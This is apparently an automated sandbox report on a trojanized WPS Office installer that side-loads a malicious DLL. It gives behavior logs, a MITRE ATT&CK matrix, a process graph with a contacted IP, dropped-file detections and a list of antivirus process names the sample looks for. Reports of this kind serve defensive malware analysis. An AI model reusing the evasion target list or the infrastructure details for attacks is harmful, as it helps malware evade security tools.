Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_0332DF10
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03335D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_03335D22
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,3_2_03326A70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ShellExperienceHosts.exeBinary or memory string: acs.exe
Source: ShellExperienceHosts.exeBinary or memory string: vsserv.exe
Source: ShellExperienceHosts.exeBinary or memory string: kxetray.exe
Source: ShellExperienceHosts.exeBinary or memory string: avcenter.exe
Source: ShellExperienceHosts.exeBinary or memory string: KSafeTray.exe
Source: ShellExperienceHosts.exeBinary or memory string: cfp.exe
Source: ShellExperienceHosts.exeBinary or memory string: avp.exe
Source: ShellExperienceHosts.exeBinary or memory string: 360Safe.exe
Source: ShellExperienceHosts.exeBinary or memory string: rtvscan.exe
Source: ShellExperienceHosts.exeBinary or memory string: 360tray.exe
Source: ShellExperienceHosts.exeBinary or memory string: ashDisp.exe
Source: ShellExperienceHosts.exeBinary or memory string: TMBMSRV.exe
Source: ShellExperienceHosts.exeBinary or memory string: 360Tray.exe
Source: ShellExperienceHosts.exeBinary or memory string: avgwdsvc.exe
Source: ShellExperienceHosts.exeBinary or memory string: AYAgent.aye
Source: ShellExperienceHosts.exeBinary or memory string: QUHLPSVC.EXE
Source: ShellExperienceHosts.exeBinary or memory string: RavMonD.exe
Source: ShellExperienceHosts.exeBinary or memory string: Mcshield.exe
Source: ShellExperienceHosts.exeBinary or memory string: K7TSecurity.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		1
Replication Through Removable Media		1
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		1
Disable or Modify Tools		141
Input Capture		2
System Time Discovery		Remote Services12
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Screen Capture		2
Encrypted Channel		Exfiltration Over Bluetooth1
System Shutdown/Reboot
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)222
Process Injection		3
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin Shares141
Input Capture		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS28
System Information Discovery		Distributed Component Object Model2
Clipboard Data		Protocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets141
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync4
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Indicator Removal		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1581258 Sample: S1Rv3ioghk.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 67 Suricata IDS alerts for network traffic 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 5 other signatures 2->73 9 S1Rv3ioghk.exe 9 2->9         started        process3 file4 51 C:\Users\...\wps_lid.lid-s8HDMqE8a6Xy.exe, PE32 9->51 dropped 53 C:\Users\Public\Bulete\program\yyzyBase.dll, PE32 9->53 dropped 55 C:\Users\Public\...\ShellExperienceHosts.exe, PE32 9->55 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 75 Bypasses PowerShell execution policy 12->75 15 ShellExperienceHosts.exe 3 8 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 57 118.107.44.112, 18091, 18852, 49771 BCPL-SGBGPNETGlobalASNSG Singapore 15->57 45 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->45 dropped 47 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->47 dropped 49 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->49 dropped 59 Detected unpacking (creates a PE file in dynamic memory) 15->59 61 Contains functionality to inject threads in other processes 15->61 63 Contains functionality to capture and log keystrokes 15->63 65 Contains functionality to inject code into remote processes 15->65 22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        file9 signatures10 process11 process12 28 powershell.exe 1 23 22->28         started        31 conhost.exe 22->31         started        33 powershell.exe 39 24->33         started        35 conhost.exe 24->35         started        37 conhost.exe 26->37         started        39 tasklist.exe 1 26->39         started        41 tasklist.exe 1 26->41         started        43 10 other processes 26->43 signatures13 77 Loading BitLocker PowerShell Module 33->77

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
S1Rv3ioghk.exe67%VirustotalBrowse
S1Rv3ioghk.exe66%ReversingLabsWin32.Trojan.DllHijack

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Bulete\program\ShellExperienceHosts.exe0%ReversingLabs
C:\Users\Public\Bulete\program\yyzyBase.dll83%ReversingLabsWin32.Trojan.DllHijack
C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\backup.dll83%ReversingLabsWin32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://dw-collect-debug.ksord.com)datesign_eventslocal0%Avira URL Cloudsafe
https://http_.index.inicert_detailis_cached_fileverify_cert_failedKOnlineSetupImpl::__generateCacheF0%Avira URL Cloudsafe
http://crl.mi#0%Avira URL Cloudsafe
http://crl.micro#:0%Avira URL Cloudsafe
https://event.wps.comdynamicParamFinishTagt1_app_start_p_st_sv_app_gid_did_hdid3_aid_ut_rid_av_ch_db0%Avira URL Cloudsafe
http://ocsp.sectigo.com0#0%Avira URL Cloudsafe
https://s.wps.comshortLinkUrlshortlink/short-link/queryshort_link_code=geterr_signAuthorizationdevic0%Avira URL Cloudsafe
http://crl.microf?0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://www.wps.com/eulaS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
        		high
        https://sectigo.com/CPS0S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
          		high
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
            		high
            http://ocsp.sectigo.com0S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.micro#:powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://event.wps.comdynamicParamFinishTagt1_app_start_p_st_sv_app_gid_did_hdid3_aid_ut_rid_av_ch_dbS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.mi#powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
                            		high
                            https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=&version=&channS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                              		high
                              http://dw-collect-debug.ksord.com)datesign_eventslocalS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://http_.index.inicert_detailis_cached_fileverify_cert_failedKOnlineSetupImpl::__generateCacheFS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://s.wps.comshortLinkUrlshortlink/short-link/queryshort_link_code=geterr_signAuthorizationdevicS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.wps.com/privacy-policywps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                		high
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
                                  		high
                                  https://curl.se/docs/alt-svc.htmlS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://ocsp.sectigo.com0#S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/onlinesetup/package/SOFTWARES1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                        		high
                                        https://curl.se/docs/hsts.htmlS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                          		high
                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tS1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
                                            		high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yS1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
                                              		high
                                              https://aka.ms/pscore6lBpowershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drfalse
                                                  		high
                                                  http://dw-online.ksosoft.com/api/dynamicParam/v3/app/2.9.0dcsdk_eventv3.dbdcsdk_dpv3.data10CS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                                    		high
